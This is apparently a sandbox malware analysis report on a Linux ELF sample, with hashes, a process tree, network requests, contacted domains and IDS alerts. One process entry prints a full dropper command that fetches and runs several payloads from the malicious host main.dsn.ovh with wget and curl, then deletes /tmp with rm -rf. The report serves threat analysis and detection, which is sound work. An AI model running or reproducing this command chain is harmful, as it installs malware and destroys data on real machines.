| File name: | a3a1adfcbc6207f3e6e0c35d3cf03904 |
| Full analysis: | https://app.any.run/tasks/afce41f6-c4b2-4698-a45a-382720793fae |
| Verdict: | Malicious activity |
| Analysis date: | October 18, 2024, 17:11:52 |
| OS: | Ubuntu 22.04.2 |
| Indicators: | |
| MIME: | application/x-executable |
| File info: | ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, no section header |
| MD5: | A3A1ADFCBC6207F3E6E0C35D3CF03904 |
| SHA1: | F10F7793D4D78120395D11D7020AB626995E2C01 |
| SHA256: | 2636F4D5FA29C3747036D385C3EEE167ABA1AAD58C29597D21DF7E42C6149A35 |
| SSDEEP: | 48:fVqwPZ68CoSgHeg/D1K139GUTdpTXT8fc0:fYwPZ68CEQ1tbTm |
| .o | | | ELF Executable and Linkable format (generic) (100) |
|---|
| CPUArchitecture: | 32 bit |
|---|---|
| CPUByteOrder: | Little endian |
| ObjectFileType: | Executable file |
| CPUType: | i386 |
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 13908 | /bin/sh -c "sudo chown user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904\.o && chmod +x /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904\.o && DISPLAY=:0 sudo -iu user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904\.o " | /bin/sh | — | any-guest-agent |
User: root Integrity Level: UNKNOWN Exit code: 1195 | ||||
| 13909 | sudo chown user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o | /usr/bin/sudo | — | sh |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 13912 | chown user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o | /usr/bin/chown | — | sudo |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 13913 | chmod +x /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o | /usr/bin/chmod | — | sh |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 13914 | sudo -iu user /tmp/a3a1adfcbc6207f3e6e0c35d3cf03904.o | /usr/bin/sudo | — | sh |
User: root Integrity Level: UNKNOWN Exit code: 1195 | ||||
| 13915 | /bin/sh -c "wget -nc http://main\.dsn\.ovh/dns/lovely -q -P /var/tmp/; chmod 777 /var/tmp/lovely; curl http://main\.dsn\.ovh/dns/lovely -s -o /var/tmp/lovely; chmod 777 /var/tmp/lovely; cd /var/tmp; \./lovely; cd /var/tmp; rm lovely; wget -nc http://main\.dsn\.ovh/dns/lushput -q -P /tmp/; chmod 777 /tmp/lushput; curl http://main\.dsn\.ovh/dns/lushput -s -o /tmp/lushput; chmod 777 /tmp/lushput; cd /tmp; \./lushput 'wget -nc http://main\.dsn\.ovh/dns/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://main\.dsn\.ovh/dns/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; \./bitnow; cd /var/tmp; rm bitnow' 2>/dev/null; cd /tmp; rm -rf *; cd /tmp; rm -rf \.pkexec; wget -nc http://main\.dsn\.ovh/dns/seasbit -q -P /tmp/; chmod 777 /tmp/seasbit; curl http://main\.dsn\.ovh/dns/seasbit -s -o /tmp/seasbit; chmod 777 /tmp/seasbit; wget -nc http://main\.dsn\.ovh/dns/loadbit -q -P /tmp/; chmod 777 /tmp/loadbit; curl http://main\.dsn\.ovh/dns/loadbit -s -o /tmp/loadbit; chmod 777 /tmp/loadbit; cd /tmp; \./loadbit 2>/dev/null; cd /tmp; rm -rf *" | /bin/sh | — | sudo |
User: user Integrity Level: UNKNOWN Exit code: 13920 | ||||
| 13916 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | — | sh |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
| 13917 | wget -nc http://main.dsn.ovh/dns/lovely -q -P /var/tmp/ | /usr/bin/wget | sh | |
User: user Integrity Level: UNKNOWN Exit code: 482 | ||||
| 13918 | systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service | /usr/bin/systemctl | — | snapd |
User: root Integrity Level: UNKNOWN Exit code: 482 | ||||
| 13919 | systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service | /usr/bin/systemctl | — | snapd |
User: root Integrity Level: UNKNOWN Exit code: 482 | ||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 13917 | wget | /var/tmp/lovely | o | |
MD5:— | SHA256:— | |||
| 13933 | wget | /var/tmp/sshd | binary | |
MD5:— | SHA256:— | |||
| 13999 | wget | /tmp/loadbit | binary | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 204 | 91.189.91.98:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
13933 | wget | GET | — | 188.114.96.3:80 | http://main.dsn.ovh/dns/sshd | unknown | — | — | whitelisted |
13924 | wget | GET | 200 | 188.114.97.3:80 | http://main.dsn.ovh/dns/unix.sh | unknown | — | — | malicious |
13942 | wget | GET | 200 | 188.114.97.3:80 | http://main.dsn.ovh/dns/truct.sh | unknown | — | — | malicious |
13952 | wget | GET | 200 | 188.114.97.3:80 | http://main.dsn.ovh/dns/brict.sh | unknown | — | — | malicious |
— | — | GET | 200 | 188.114.96.3:80 | http://main.dsn.ovh/dns/retrict.sh | unknown | — | — | malicious |
13936 | wget | GET | 200 | 188.114.96.3:80 | http://main.dsn.ovh/dns/config.json | unknown | — | — | malicious |
13917 | wget | GET | 200 | 188.114.96.3:80 | http://main.dsn.ovh/dns/lovely | unknown | — | — | malicious |
13996 | wget | GET | 200 | 188.114.96.3:80 | http://main.dsn.ovh/dns/seasbit | unknown | — | — | malicious |
13977 | wget | GET | 200 | 188.114.97.3:80 | http://main.dsn.ovh/dns/politrict.sh | unknown | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
470 | avahi-daemon | 224.0.0.251:5353 | — | — | — | unknown |
— | — | 185.125.190.48:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted |
— | — | 91.189.91.98:80 | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted |
— | — | 169.150.255.180:443 | odrs.gnome.org | — | GB | whitelisted |
485 | snapd | 185.125.188.55:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
485 | snapd | 185.125.188.59:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
13917 | wget | 188.114.96.3:80 | main.dsn.ovh | CLOUDFLARENET | NL | malicious |
13924 | wget | 188.114.97.3:80 | main.dsn.ovh | CLOUDFLARENET | NL | malicious |
485 | snapd | 185.125.188.58:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
485 | snapd | 185.125.188.54:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
Domain | IP | Reputation |
|---|---|---|
connectivity-check.ubuntu.com |
| whitelisted |
google.com |
| whitelisted |
odrs.gnome.org |
| whitelisted |
api.snapcraft.io |
| whitelisted |
main.dsn.ovh |
| malicious |
61.100.168.192.in-addr.arpa |
| unknown |
dash.dsn.ovh |
| unknown |
dash.cloudflare.ovh |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
13917 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP |
13933 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP |
13985 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP |
13996 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP |
13999 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP |